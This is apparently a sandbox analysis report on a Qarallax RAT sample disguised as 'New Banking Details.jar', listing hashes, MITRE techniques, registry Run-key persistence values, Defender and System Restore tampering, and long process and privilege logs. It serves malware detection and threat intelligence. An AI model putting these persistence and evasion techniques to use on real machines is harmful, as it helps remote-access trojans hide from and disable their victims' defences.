qarallax | d4a142b9eba6dff66deadaea2777b5ce1d7fc551f94b5e7f87ba6a84709106c9

Analysis

max time kernel
148s
max time network
151s
platform
windows10_x64
resource
win10v200722
submitted
06-08-2020 07:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Banking Details.jar
Size

410KB
MD5

7ff8c97e2fe1c972876ee4cc84238074
SHA1

fb1d4dff5cedba4dc4eb0ddf662fc9be2d39e696
SHA256

d4a142b9eba6dff66deadaea2777b5ce1d7fc551f94b5e7f87ba6a84709106c9
SHA512

0531582de07c475fa4ebe358d5336ed810fcdb0adbcbcd8738a66b4aa7cd66eeb11837ce63cd534a23ff277f8a5d50e7a806675379f97e8e34cf45ede9d86759

Score

10^/10

persistence trojan qarallax evasion

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae2c-56.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
504	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\hmJMe\Desktop.ini	java.exe
File created	C:\Users\Admin\hmJMe\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\hmJMe\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\hmJMe\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\vdIxM	java.exe
File opened for modification	C:\Windows\System32\vdIxM	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
4200	taskkill.exe
3620	taskkill.exe
4744	taskkill.exe
4800	taskkill.exe
4376	taskkill.exe
1464	taskkill.exe
4572	taskkill.exe
4024	taskkill.exe
4528	taskkill.exe
4268	taskkill.exe
1820	taskkill.exe
4916	taskkill.exe
3552	taskkill.exe
5028	taskkill.exe
1020	taskkill.exe
4752	taskkill.exe
4624	taskkill.exe
4120	taskkill.exe
3848	taskkill.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2684	powershell.exe
2684	powershell.exe
2684	powershell.exe
2684	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
504	java.exe

Suspicious use of AdjustPrivilegeToken 125 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	572	WMIC.exe
Token: SeSecurityPrivilege	572	WMIC.exe
Token: SeTakeOwnershipPrivilege	572	WMIC.exe
Token: SeLoadDriverPrivilege	572	WMIC.exe
Token: SeSystemProfilePrivilege	572	WMIC.exe
Token: SeSystemtimePrivilege	572	WMIC.exe
Token: SeProfSingleProcessPrivilege	572	WMIC.exe
Token: SeIncBasePriorityPrivilege	572	WMIC.exe
Token: SeCreatePagefilePrivilege	572	WMIC.exe
Token: SeBackupPrivilege	572	WMIC.exe
Token: SeRestorePrivilege	572	WMIC.exe
Token: SeShutdownPrivilege	572	WMIC.exe
Token: SeDebugPrivilege	572	WMIC.exe
Token: SeSystemEnvironmentPrivilege	572	WMIC.exe
Token: SeRemoteShutdownPrivilege	572	WMIC.exe
Token: SeUndockPrivilege	572	WMIC.exe
Token: SeManageVolumePrivilege	572	WMIC.exe
Token: 33	572	WMIC.exe
Token: 34	572	WMIC.exe
Token: 35	572	WMIC.exe
Token: 36	572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	572	WMIC.exe
Token: SeSecurityPrivilege	572	WMIC.exe
Token: SeTakeOwnershipPrivilege	572	WMIC.exe
Token: SeLoadDriverPrivilege	572	WMIC.exe
Token: SeSystemProfilePrivilege	572	WMIC.exe
Token: SeSystemtimePrivilege	572	WMIC.exe
Token: SeProfSingleProcessPrivilege	572	WMIC.exe
Token: SeIncBasePriorityPrivilege	572	WMIC.exe
Token: SeCreatePagefilePrivilege	572	WMIC.exe
Token: SeBackupPrivilege	572	WMIC.exe
Token: SeRestorePrivilege	572	WMIC.exe
Token: SeShutdownPrivilege	572	WMIC.exe
Token: SeDebugPrivilege	572	WMIC.exe
Token: SeSystemEnvironmentPrivilege	572	WMIC.exe
Token: SeRemoteShutdownPrivilege	572	WMIC.exe
Token: SeUndockPrivilege	572	WMIC.exe
Token: SeManageVolumePrivilege	572	WMIC.exe
Token: 33	572	WMIC.exe
Token: 34	572	WMIC.exe
Token: 35	572	WMIC.exe
Token: 36	572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3140	WMIC.exe
Token: SeSecurityPrivilege	3140	WMIC.exe
Token: SeTakeOwnershipPrivilege	3140	WMIC.exe
Token: SeLoadDriverPrivilege	3140	WMIC.exe
Token: SeSystemProfilePrivilege	3140	WMIC.exe
Token: SeSystemtimePrivilege	3140	WMIC.exe
Token: SeProfSingleProcessPrivilege	3140	WMIC.exe
Token: SeIncBasePriorityPrivilege	3140	WMIC.exe
Token: SeCreatePagefilePrivilege	3140	WMIC.exe
Token: SeBackupPrivilege	3140	WMIC.exe
Token: SeRestorePrivilege	3140	WMIC.exe
Token: SeShutdownPrivilege	3140	WMIC.exe
Token: SeDebugPrivilege	3140	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3140	WMIC.exe
Token: SeRemoteShutdownPrivilege	3140	WMIC.exe
Token: SeUndockPrivilege	3140	WMIC.exe
Token: SeManageVolumePrivilege	3140	WMIC.exe
Token: 33	3140	WMIC.exe
Token: 34	3140	WMIC.exe
Token: 35	3140	WMIC.exe
Token: 36	3140	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3140	WMIC.exe
Token: SeSecurityPrivilege	3140	WMIC.exe
Token: SeTakeOwnershipPrivilege	3140	WMIC.exe
Token: SeLoadDriverPrivilege	3140	WMIC.exe
Token: SeSystemProfilePrivilege	3140	WMIC.exe
Token: SeSystemtimePrivilege	3140	WMIC.exe
Token: SeProfSingleProcessPrivilege	3140	WMIC.exe
Token: SeIncBasePriorityPrivilege	3140	WMIC.exe
Token: SeCreatePagefilePrivilege	3140	WMIC.exe
Token: SeBackupPrivilege	3140	WMIC.exe
Token: SeRestorePrivilege	3140	WMIC.exe
Token: SeShutdownPrivilege	3140	WMIC.exe
Token: SeDebugPrivilege	3140	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3140	WMIC.exe
Token: SeRemoteShutdownPrivilege	3140	WMIC.exe
Token: SeUndockPrivilege	3140	WMIC.exe
Token: SeManageVolumePrivilege	3140	WMIC.exe
Token: 33	3140	WMIC.exe
Token: 34	3140	WMIC.exe
Token: 35	3140	WMIC.exe
Token: 36	3140	WMIC.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	3620	taskkill.exe
Token: SeDebugPrivilege	4528	taskkill.exe
Token: SeDebugPrivilege	4268	taskkill.exe
Token: SeDebugPrivilege	4624	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2684	powershell.exe
Token: SeSecurityPrivilege	2684	powershell.exe
Token: SeTakeOwnershipPrivilege	2684	powershell.exe
Token: SeLoadDriverPrivilege	2684	powershell.exe
Token: SeSystemProfilePrivilege	2684	powershell.exe
Token: SeSystemtimePrivilege	2684	powershell.exe
Token: SeProfSingleProcessPrivilege	2684	powershell.exe
Token: SeIncBasePriorityPrivilege	2684	powershell.exe
Token: SeCreatePagefilePrivilege	2684	powershell.exe
Token: SeBackupPrivilege	2684	powershell.exe
Token: SeRestorePrivilege	2684	powershell.exe
Token: SeShutdownPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeSystemEnvironmentPrivilege	2684	powershell.exe
Token: SeRemoteShutdownPrivilege	2684	powershell.exe
Token: SeUndockPrivilege	2684	powershell.exe
Token: SeManageVolumePrivilege	2684	powershell.exe
Token: 33	2684	powershell.exe
Token: 34	2684	powershell.exe
Token: 35	2684	powershell.exe
Token: 36	2684	powershell.exe
Token: SeDebugPrivilege	4744	taskkill.exe
Token: SeDebugPrivilege	4120	taskkill.exe
Token: SeDebugPrivilege	4800	taskkill.exe
Token: SeDebugPrivilege	5028	taskkill.exe
Token: SeDebugPrivilege	3848	taskkill.exe
Token: SeDebugPrivilege	4200	taskkill.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeDebugPrivilege	4376	taskkill.exe
Token: SeDebugPrivilege	1020	taskkill.exe
Token: SeDebugPrivilege	1464	taskkill.exe
Token: SeDebugPrivilege	4572	taskkill.exe
Token: SeDebugPrivilege	4752	taskkill.exe
Token: SeDebugPrivilege	4916	taskkill.exe
Token: SeDebugPrivilege	4024	taskkill.exe
Token: SeDebugPrivilege	3552	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
504	java.exe

Suspicious use of WriteProcessMemory 412 IoCs

description	pid	Process	procid_target
PID 504 wrote to memory of 3560	504	java.exe	69
PID 504 wrote to memory of 3560	504	java.exe	69
PID 504 wrote to memory of 1864	504	java.exe	71
PID 504 wrote to memory of 1864	504	java.exe	71
PID 1864 wrote to memory of 572	1864	cmd.exe	73
PID 1864 wrote to memory of 572	1864	cmd.exe	73
PID 504 wrote to memory of 4020	504	java.exe	74
PID 504 wrote to memory of 4020	504	java.exe	74
PID 4020 wrote to memory of 3140	4020	cmd.exe	76
PID 4020 wrote to memory of 3140	4020	cmd.exe	76
PID 504 wrote to memory of 3688	504	java.exe	77
PID 504 wrote to memory of 3688	504	java.exe	77
PID 504 wrote to memory of 3172	504	java.exe	79
PID 504 wrote to memory of 3172	504	java.exe	79
PID 504 wrote to memory of 4076	504	java.exe	82
PID 504 wrote to memory of 4076	504	java.exe	82
PID 504 wrote to memory of 1064	504	java.exe	83
PID 504 wrote to memory of 1064	504	java.exe	83
PID 504 wrote to memory of 1152	504	java.exe	85
PID 504 wrote to memory of 1152	504	java.exe	85
PID 504 wrote to memory of 1376	504	java.exe	87
PID 504 wrote to memory of 1376	504	java.exe	87
PID 504 wrote to memory of 1476	504	java.exe	89
PID 504 wrote to memory of 1476	504	java.exe	89
PID 504 wrote to memory of 3540	504	java.exe	91
PID 504 wrote to memory of 3540	504	java.exe	91
PID 504 wrote to memory of 3960	504	java.exe	94
PID 504 wrote to memory of 3960	504	java.exe	94
PID 504 wrote to memory of 2684	504	java.exe	96
PID 504 wrote to memory of 2684	504	java.exe	96
PID 504 wrote to memory of 3620	504	java.exe	98
PID 504 wrote to memory of 3620	504	java.exe	98
PID 504 wrote to memory of 1268	504	java.exe	99
PID 504 wrote to memory of 1268	504	java.exe	99
PID 504 wrote to memory of 60	504	java.exe	100
PID 504 wrote to memory of 60	504	java.exe	100
PID 3960 wrote to memory of 3264	3960	cmd.exe	103
PID 3960 wrote to memory of 3264	3960	cmd.exe	103
PID 504 wrote to memory of 3044	504	java.exe	104
PID 504 wrote to memory of 3044	504	java.exe	104
PID 504 wrote to memory of 3776	504	java.exe	106
PID 504 wrote to memory of 3776	504	java.exe	106
PID 504 wrote to memory of 1492	504	java.exe	108
PID 504 wrote to memory of 1492	504	java.exe	108
PID 504 wrote to memory of 572	504	java.exe	110
PID 504 wrote to memory of 572	504	java.exe	110
PID 504 wrote to memory of 2604	504	java.exe	112
PID 504 wrote to memory of 2604	504	java.exe	112
PID 504 wrote to memory of 1440	504	java.exe	114
PID 504 wrote to memory of 1440	504	java.exe	114
PID 504 wrote to memory of 3564	504	java.exe	117
PID 504 wrote to memory of 3564	504	java.exe	117
PID 504 wrote to memory of 1120	504	java.exe	118
PID 504 wrote to memory of 1120	504	java.exe	118
PID 504 wrote to memory of 4260	504	java.exe	121
PID 504 wrote to memory of 4260	504	java.exe	121
PID 504 wrote to memory of 4284	504	java.exe	122
PID 504 wrote to memory of 4284	504	java.exe	122
PID 504 wrote to memory of 4364	504	java.exe	125
PID 504 wrote to memory of 4364	504	java.exe	125
PID 504 wrote to memory of 4404	504	java.exe	126
PID 504 wrote to memory of 4404	504	java.exe	126
PID 3960 wrote to memory of 4440	3960	cmd.exe	128
PID 3960 wrote to memory of 4440	3960	cmd.exe	128
PID 504 wrote to memory of 4488	504	java.exe	130
PID 504 wrote to memory of 4488	504	java.exe	130
PID 504 wrote to memory of 4500	504	java.exe	131
PID 504 wrote to memory of 4500	504	java.exe	131
PID 504 wrote to memory of 4528	504	java.exe	132
PID 504 wrote to memory of 4528	504	java.exe	132
PID 504 wrote to memory of 4600	504	java.exe	135
PID 504 wrote to memory of 4600	504	java.exe	135
PID 504 wrote to memory of 4640	504	java.exe	137
PID 504 wrote to memory of 4640	504	java.exe	137
PID 504 wrote to memory of 4724	504	java.exe	140
PID 504 wrote to memory of 4724	504	java.exe	140
PID 504 wrote to memory of 4740	504	java.exe	141
PID 504 wrote to memory of 4740	504	java.exe	141
PID 504 wrote to memory of 4824	504	java.exe	144
PID 504 wrote to memory of 4824	504	java.exe	144
PID 504 wrote to memory of 4832	504	java.exe	145
PID 504 wrote to memory of 4832	504	java.exe	145
PID 504 wrote to memory of 4976	504	java.exe	149
PID 504 wrote to memory of 4976	504	java.exe	149
PID 504 wrote to memory of 4988	504	java.exe	150
PID 504 wrote to memory of 4988	504	java.exe	150
PID 504 wrote to memory of 1332	504	java.exe	153
PID 504 wrote to memory of 1332	504	java.exe	153
PID 504 wrote to memory of 3836	504	java.exe	154
PID 504 wrote to memory of 3836	504	java.exe	154
PID 504 wrote to memory of 1400	504	java.exe	155
PID 504 wrote to memory of 1400	504	java.exe	155
PID 504 wrote to memory of 3144	504	java.exe	159
PID 504 wrote to memory of 3144	504	java.exe	159
PID 504 wrote to memory of 1140	504	java.exe	161
PID 504 wrote to memory of 1140	504	java.exe	161
PID 504 wrote to memory of 4268	504	java.exe	162
PID 504 wrote to memory of 4268	504	java.exe	162
PID 504 wrote to memory of 3892	504	java.exe	164
PID 504 wrote to memory of 3892	504	java.exe	164
PID 1332 wrote to memory of 4144	1332	cmd.exe	167
PID 1332 wrote to memory of 4144	1332	cmd.exe	167
PID 504 wrote to memory of 4112	504	java.exe	168
PID 504 wrote to memory of 4112	504	java.exe	168
PID 504 wrote to memory of 4208	504	java.exe	170
PID 504 wrote to memory of 4208	504	java.exe	170
PID 504 wrote to memory of 4312	504	java.exe	172
PID 504 wrote to memory of 4312	504	java.exe	172
PID 1332 wrote to memory of 4448	1332	cmd.exe	174
PID 1332 wrote to memory of 4448	1332	cmd.exe	174
PID 504 wrote to memory of 4028	504	java.exe	175
PID 504 wrote to memory of 4028	504	java.exe	175
PID 504 wrote to memory of 4624	504	java.exe	176
PID 504 wrote to memory of 4624	504	java.exe	176
PID 4028 wrote to memory of 4668	4028	cmd.exe	179
PID 4028 wrote to memory of 4668	4028	cmd.exe	179
PID 4028 wrote to memory of 4284	4028	cmd.exe	180
PID 4028 wrote to memory of 4284	4028	cmd.exe	180
PID 504 wrote to memory of 4368	504	java.exe	181
PID 504 wrote to memory of 4368	504	java.exe	181
PID 4368 wrote to memory of 4760	4368	cmd.exe	183
PID 4368 wrote to memory of 4760	4368	cmd.exe	183
PID 4368 wrote to memory of 4484	4368	cmd.exe	184
PID 4368 wrote to memory of 4484	4368	cmd.exe	184
PID 504 wrote to memory of 4540	504	java.exe	185
PID 504 wrote to memory of 4540	504	java.exe	185
PID 4540 wrote to memory of 4492	4540	cmd.exe	187
PID 4540 wrote to memory of 4492	4540	cmd.exe	187
PID 4540 wrote to memory of 4512	4540	cmd.exe	188
PID 4540 wrote to memory of 4512	4540	cmd.exe	188
PID 504 wrote to memory of 5064	504	java.exe	190
PID 504 wrote to memory of 5064	504	java.exe	190
PID 5064 wrote to memory of 4640	5064	cmd.exe	192
PID 5064 wrote to memory of 4640	5064	cmd.exe	192
PID 5064 wrote to memory of 4764	5064	cmd.exe	193
PID 5064 wrote to memory of 4764	5064	cmd.exe	193
PID 504 wrote to memory of 4596	504	java.exe	194
PID 504 wrote to memory of 4596	504	java.exe	194
PID 504 wrote to memory of 4744	504	java.exe	196
PID 504 wrote to memory of 4744	504	java.exe	196
PID 4596 wrote to memory of 5100	4596	cmd.exe	198
PID 4596 wrote to memory of 5100	4596	cmd.exe	198
PID 4596 wrote to memory of 4740	4596	cmd.exe	199
PID 4596 wrote to memory of 4740	4596	cmd.exe	199
PID 504 wrote to memory of 1496	504	java.exe	200
PID 504 wrote to memory of 1496	504	java.exe	200
PID 1496 wrote to memory of 5016	1496	cmd.exe	202
PID 1496 wrote to memory of 5016	1496	cmd.exe	202
PID 1496 wrote to memory of 4832	1496	cmd.exe	203
PID 1496 wrote to memory of 4832	1496	cmd.exe	203
PID 504 wrote to memory of 5032	504	java.exe	204
PID 504 wrote to memory of 5032	504	java.exe	204
PID 5032 wrote to memory of 4024	5032	cmd.exe	206
PID 5032 wrote to memory of 4024	5032	cmd.exe	206
PID 5032 wrote to memory of 2364	5032	cmd.exe	207
PID 5032 wrote to memory of 2364	5032	cmd.exe	207
PID 504 wrote to memory of 4988	504	java.exe	208
PID 504 wrote to memory of 4988	504	java.exe	208
PID 4988 wrote to memory of 5060	4988	cmd.exe	210
PID 4988 wrote to memory of 5060	4988	cmd.exe	210
PID 4988 wrote to memory of 5052	4988	cmd.exe	211
PID 4988 wrote to memory of 5052	4988	cmd.exe	211
PID 504 wrote to memory of 3988	504	java.exe	212
PID 504 wrote to memory of 3988	504	java.exe	212
PID 3988 wrote to memory of 3748	3988	cmd.exe	214
PID 3988 wrote to memory of 3748	3988	cmd.exe	214
PID 3988 wrote to memory of 1400	3988	cmd.exe	215
PID 3988 wrote to memory of 1400	3988	cmd.exe	215
PID 504 wrote to memory of 4120	504	java.exe	216
PID 504 wrote to memory of 4120	504	java.exe	216
PID 504 wrote to memory of 4180	504	java.exe	218
PID 504 wrote to memory of 4180	504	java.exe	218
PID 4180 wrote to memory of 4272	4180	cmd.exe	220
PID 4180 wrote to memory of 4272	4180	cmd.exe	220
PID 4180 wrote to memory of 928	4180	cmd.exe	221
PID 4180 wrote to memory of 928	4180	cmd.exe	221
PID 504 wrote to memory of 1140	504	java.exe	222
PID 504 wrote to memory of 1140	504	java.exe	222
PID 1140 wrote to memory of 3688	1140	cmd.exe	224
PID 1140 wrote to memory of 3688	1140	cmd.exe	224
PID 1140 wrote to memory of 3628	1140	cmd.exe	225
PID 1140 wrote to memory of 3628	1140	cmd.exe	225
PID 504 wrote to memory of 3540	504	java.exe	226
PID 504 wrote to memory of 3540	504	java.exe	226
PID 3540 wrote to memory of 3948	3540	cmd.exe	228
PID 3540 wrote to memory of 3948	3540	cmd.exe	228
PID 3540 wrote to memory of 4008	3540	cmd.exe	229
PID 3540 wrote to memory of 4008	3540	cmd.exe	229
PID 504 wrote to memory of 4052	504	java.exe	230
PID 504 wrote to memory of 4052	504	java.exe	230
PID 4052 wrote to memory of 3088	4052	cmd.exe	232
PID 4052 wrote to memory of 3088	4052	cmd.exe	232
PID 4052 wrote to memory of 3736	4052	cmd.exe	233
PID 4052 wrote to memory of 3736	4052	cmd.exe	233
PID 504 wrote to memory of 2648	504	java.exe	234
PID 504 wrote to memory of 2648	504	java.exe	234
PID 2648 wrote to memory of 4268	2648	cmd.exe	236
PID 2648 wrote to memory of 4268	2648	cmd.exe	236
PID 2648 wrote to memory of 3620	2648	cmd.exe	237
PID 2648 wrote to memory of 3620	2648	cmd.exe	237
PID 504 wrote to memory of 4800	504	java.exe	238
PID 504 wrote to memory of 4800	504	java.exe	238
PID 504 wrote to memory of 4144	504	java.exe	240
PID 504 wrote to memory of 4144	504	java.exe	240
PID 4144 wrote to memory of 4564	4144	cmd.exe	242
PID 4144 wrote to memory of 4564	4144	cmd.exe	242
PID 4144 wrote to memory of 4788	4144	cmd.exe	243
PID 4144 wrote to memory of 4788	4144	cmd.exe	243
PID 504 wrote to memory of 4324	504	java.exe	244
PID 504 wrote to memory of 4324	504	java.exe	244
PID 4324 wrote to memory of 4400	4324	cmd.exe	246
PID 4324 wrote to memory of 4400	4324	cmd.exe	246
PID 4324 wrote to memory of 4716	4324	cmd.exe	247
PID 4324 wrote to memory of 4716	4324	cmd.exe	247
PID 504 wrote to memory of 4760	504	java.exe	248
PID 504 wrote to memory of 4760	504	java.exe	248
PID 4760 wrote to memory of 4644	4760	cmd.exe	250
PID 4760 wrote to memory of 4644	4760	cmd.exe	250
PID 4760 wrote to memory of 4460	4760	cmd.exe	251
PID 4760 wrote to memory of 4460	4760	cmd.exe	251
PID 504 wrote to memory of 4916	504	java.exe	252
PID 504 wrote to memory of 4916	504	java.exe	252
PID 4916 wrote to memory of 4040	4916	cmd.exe	254
PID 4916 wrote to memory of 4040	4916	cmd.exe	254
PID 4916 wrote to memory of 1780	4916	cmd.exe	255
PID 4916 wrote to memory of 1780	4916	cmd.exe	255
PID 504 wrote to memory of 4648	504	java.exe	256
PID 504 wrote to memory of 4648	504	java.exe	256
PID 4648 wrote to memory of 1332	4648	cmd.exe	258
PID 4648 wrote to memory of 1332	4648	cmd.exe	258
PID 4648 wrote to memory of 4364	4648	cmd.exe	259
PID 4648 wrote to memory of 4364	4648	cmd.exe	259
PID 504 wrote to memory of 4108	504	java.exe	260
PID 504 wrote to memory of 4108	504	java.exe	260
PID 4108 wrote to memory of 4600	4108	cmd.exe	262
PID 4108 wrote to memory of 4600	4108	cmd.exe	262
PID 4108 wrote to memory of 4848	4108	cmd.exe	263
PID 4108 wrote to memory of 4848	4108	cmd.exe	263
PID 504 wrote to memory of 4740	504	java.exe	264
PID 504 wrote to memory of 4740	504	java.exe	264
PID 4740 wrote to memory of 4920	4740	cmd.exe	266
PID 4740 wrote to memory of 4920	4740	cmd.exe	266
PID 504 wrote to memory of 5028	504	java.exe	267
PID 504 wrote to memory of 5028	504	java.exe	267
PID 4740 wrote to memory of 4924	4740	cmd.exe	268
PID 4740 wrote to memory of 4924	4740	cmd.exe	268
PID 504 wrote to memory of 4684	504	java.exe	270
PID 504 wrote to memory of 4684	504	java.exe	270
PID 4684 wrote to memory of 4240	4684	cmd.exe	272
PID 4684 wrote to memory of 4240	4684	cmd.exe	272
PID 4684 wrote to memory of 4220	4684	cmd.exe	273
PID 4684 wrote to memory of 4220	4684	cmd.exe	273
PID 504 wrote to memory of 3624	504	java.exe	274
PID 504 wrote to memory of 3624	504	java.exe	274
PID 3624 wrote to memory of 4024	3624	cmd.exe	276
PID 3624 wrote to memory of 4024	3624	cmd.exe	276
PID 3624 wrote to memory of 5108	3624	cmd.exe	277
PID 3624 wrote to memory of 5108	3624	cmd.exe	277
PID 504 wrote to memory of 4128	504	java.exe	278
PID 504 wrote to memory of 4128	504	java.exe	278
PID 4128 wrote to memory of 2604	4128	cmd.exe	280
PID 4128 wrote to memory of 2604	4128	cmd.exe	280
PID 4128 wrote to memory of 2128	4128	cmd.exe	281
PID 4128 wrote to memory of 2128	4128	cmd.exe	281
PID 504 wrote to memory of 4164	504	java.exe	282
PID 504 wrote to memory of 4164	504	java.exe	282
PID 4164 wrote to memory of 3580	4164	cmd.exe	284
PID 4164 wrote to memory of 3580	4164	cmd.exe	284
PID 4164 wrote to memory of 4296	4164	cmd.exe	285
PID 4164 wrote to memory of 4296	4164	cmd.exe	285
PID 504 wrote to memory of 4216	504	java.exe	286
PID 504 wrote to memory of 4216	504	java.exe	286
PID 4216 wrote to memory of 4188	4216	cmd.exe	288
PID 4216 wrote to memory of 4188	4216	cmd.exe	288
PID 4216 wrote to memory of 4344	4216	cmd.exe	289
PID 4216 wrote to memory of 4344	4216	cmd.exe	289
PID 504 wrote to memory of 4276	504	java.exe	290
PID 504 wrote to memory of 4276	504	java.exe	290
PID 4276 wrote to memory of 3948	4276	cmd.exe	292
PID 4276 wrote to memory of 3948	4276	cmd.exe	292
PID 4276 wrote to memory of 4416	4276	cmd.exe	293
PID 4276 wrote to memory of 4416	4276	cmd.exe	293
PID 504 wrote to memory of 4080	504	java.exe	294
PID 504 wrote to memory of 4080	504	java.exe	294
PID 4080 wrote to memory of 1152	4080	cmd.exe	296
PID 4080 wrote to memory of 1152	4080	cmd.exe	296
PID 504 wrote to memory of 3848	504	java.exe	297
PID 504 wrote to memory of 3848	504	java.exe	297
PID 4080 wrote to memory of 3620	4080	cmd.exe	299
PID 4080 wrote to memory of 3620	4080	cmd.exe	299
PID 504 wrote to memory of 4564	504	java.exe	300
PID 504 wrote to memory of 4564	504	java.exe	300
PID 4564 wrote to memory of 4680	4564	cmd.exe	302
PID 4564 wrote to memory of 4680	4564	cmd.exe	302
PID 4564 wrote to memory of 4620	4564	cmd.exe	303
PID 4564 wrote to memory of 4620	4564	cmd.exe	303
PID 504 wrote to memory of 4252	504	java.exe	304
PID 504 wrote to memory of 4252	504	java.exe	304
PID 4252 wrote to memory of 4656	4252	cmd.exe	306
PID 4252 wrote to memory of 4656	4252	cmd.exe	306
PID 4252 wrote to memory of 4460	4252	cmd.exe	307
PID 4252 wrote to memory of 4460	4252	cmd.exe	307
PID 504 wrote to memory of 4408	504	java.exe	308
PID 504 wrote to memory of 4408	504	java.exe	308
PID 4408 wrote to memory of 4368	4408	cmd.exe	310
PID 4408 wrote to memory of 4368	4408	cmd.exe	310
PID 4408 wrote to memory of 4092	4408	cmd.exe	311
PID 4408 wrote to memory of 4092	4408	cmd.exe	311
PID 504 wrote to memory of 3992	504	java.exe	313
PID 504 wrote to memory of 3992	504	java.exe	313
PID 3992 wrote to memory of 4852	3992	cmd.exe	316
PID 3992 wrote to memory of 4852	3992	cmd.exe	316
PID 3992 wrote to memory of 5024	3992	cmd.exe	317
PID 3992 wrote to memory of 5024	3992	cmd.exe	317
PID 504 wrote to memory of 1348	504	java.exe	318
PID 504 wrote to memory of 1348	504	java.exe	318
PID 1348 wrote to memory of 2732	1348	cmd.exe	320
PID 1348 wrote to memory of 2732	1348	cmd.exe	320
PID 1348 wrote to memory of 1204	1348	cmd.exe	321
PID 1348 wrote to memory of 1204	1348	cmd.exe	321
PID 504 wrote to memory of 4172	504	java.exe	322
PID 504 wrote to memory of 4172	504	java.exe	322
PID 4172 wrote to memory of 1604	4172	cmd.exe	324
PID 4172 wrote to memory of 1604	4172	cmd.exe	324
PID 4172 wrote to memory of 3048	4172	cmd.exe	325
PID 4172 wrote to memory of 3048	4172	cmd.exe	325
PID 504 wrote to memory of 4356	504	java.exe	326
PID 504 wrote to memory of 4356	504	java.exe	326
PID 504 wrote to memory of 4200	504	java.exe	328
PID 504 wrote to memory of 4200	504	java.exe	328
PID 4356 wrote to memory of 4100	4356	cmd.exe	329
PID 4356 wrote to memory of 4100	4356	cmd.exe	329
PID 4356 wrote to memory of 4452	4356	cmd.exe	331
PID 4356 wrote to memory of 4452	4356	cmd.exe	331
PID 504 wrote to memory of 4288	504	java.exe	333
PID 504 wrote to memory of 4288	504	java.exe	333
PID 4288 wrote to memory of 3836	4288	cmd.exe	335
PID 4288 wrote to memory of 3836	4288	cmd.exe	335
PID 4288 wrote to memory of 1496	4288	cmd.exe	336
PID 4288 wrote to memory of 1496	4288	cmd.exe	336
PID 504 wrote to memory of 4324	504	java.exe	337
PID 504 wrote to memory of 4324	504	java.exe	337
PID 4324 wrote to memory of 5064	4324	cmd.exe	339
PID 4324 wrote to memory of 5064	4324	cmd.exe	339
PID 4324 wrote to memory of 4612	4324	cmd.exe	340
PID 4324 wrote to memory of 4612	4324	cmd.exe	340
PID 504 wrote to memory of 1480	504	java.exe	341
PID 504 wrote to memory of 1480	504	java.exe	341
PID 1480 wrote to memory of 4916	1480	cmd.exe	343
PID 1480 wrote to memory of 4916	1480	cmd.exe	343
PID 1480 wrote to memory of 4116	1480	cmd.exe	344
PID 1480 wrote to memory of 4116	1480	cmd.exe	344
PID 504 wrote to memory of 4856	504	java.exe	345
PID 504 wrote to memory of 4856	504	java.exe	345
PID 4856 wrote to memory of 4448	4856	cmd.exe	347
PID 4856 wrote to memory of 4448	4856	cmd.exe	347
PID 4856 wrote to memory of 2364	4856	cmd.exe	348
PID 4856 wrote to memory of 2364	4856	cmd.exe	348
PID 504 wrote to memory of 5076	504	java.exe	349
PID 504 wrote to memory of 5076	504	java.exe	349
PID 5076 wrote to memory of 1400	5076	cmd.exe	351
PID 5076 wrote to memory of 1400	5076	cmd.exe	351
PID 5076 wrote to memory of 2128	5076	cmd.exe	352
PID 5076 wrote to memory of 2128	5076	cmd.exe	352
PID 504 wrote to memory of 3100	504	java.exe	353
PID 504 wrote to memory of 3100	504	java.exe	353
PID 3100 wrote to memory of 1224	3100	cmd.exe	355
PID 3100 wrote to memory of 1224	3100	cmd.exe	355
